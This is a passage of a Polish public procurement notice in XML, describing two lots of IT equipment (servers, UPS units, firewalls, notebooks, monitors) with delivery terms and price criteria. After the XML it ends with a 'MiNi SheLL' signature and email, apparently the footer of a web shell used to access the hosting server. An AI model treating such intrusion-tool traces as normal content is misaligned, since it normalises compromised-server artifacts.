/><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji /><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu>N</IV_6_2_SkrocenieTerminu><IV_6_2_Powody></IV_6_2_Powody><IV_6_6></IV_6_6><IV_6_5 /><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie>T</czy_uniewaznienie><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci>1</nr_czesci><nazwa>Pakiet 1 </nazwa><opis> Przedmiotem zamówienia jest jednorazowa dostawa na rzecz Zamawiającego i Partnerów asortymentu związanego z infrastrukturą informatyczną - 6 sztuk serwerów, 6 sztuk UPS oraz 6 sztuk Firewall wraz z oprogramowaniem, szczegółowo opisanych w Formularzu asortymentowo-cenowym (załączniku 2A), stanowiącym integralną część specyfikacji istotnych warunków zamówienia.
</opis><informacje_dodatkowe>Zamówienie w ramach umowy należy zrealizować w terminie nie dłuższym niż 21 dni od zawarcia umowy 
(w zakresie Pakietu 1 istnieje możliwość uzyskania punktów dodatkowych w przypadku wykonania dostawy w ciągu 14 dni od zawarcia umowy).
</informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>32420000-3</cpv1c>48820000-2<czas>
              O
            </czas><czas_dni>21</czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon></data_kon><kryt_cena></kryt_cena><kryt_1>Cena </kryt_1><kryt_1p>60</kryt_1p></cz_0><cz_1><nr_czesci>2</nr_czesci><nazwa>Pakiet 2</nazwa><opis> Przedmiotem zamówienia jest jednorazowa dostawa na rzecz Zamawiającego i Partnerów asortymentu związanego z infrastrukturą informatyczną - 24 sztuki notebooków wraz z oprogramowaniem i 6 sztuk monitorów z urządzeniami peryferyjnymi,szczegółowo opisanych w Formularzu asortymentowo-cenowym (załączniku 2A), stanowiącym integralną część specyfikacji istotnych warunków zamówienia.</opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c>30213100-6</cpv1c>30231310-3<czas>
              O
            </czas><czas_dni>21</czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon></data_kon><kryt_cena></kryt_cena><kryt_1>Cena </kryt_1><kryt_1p>60</kryt_1p></cz_1></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com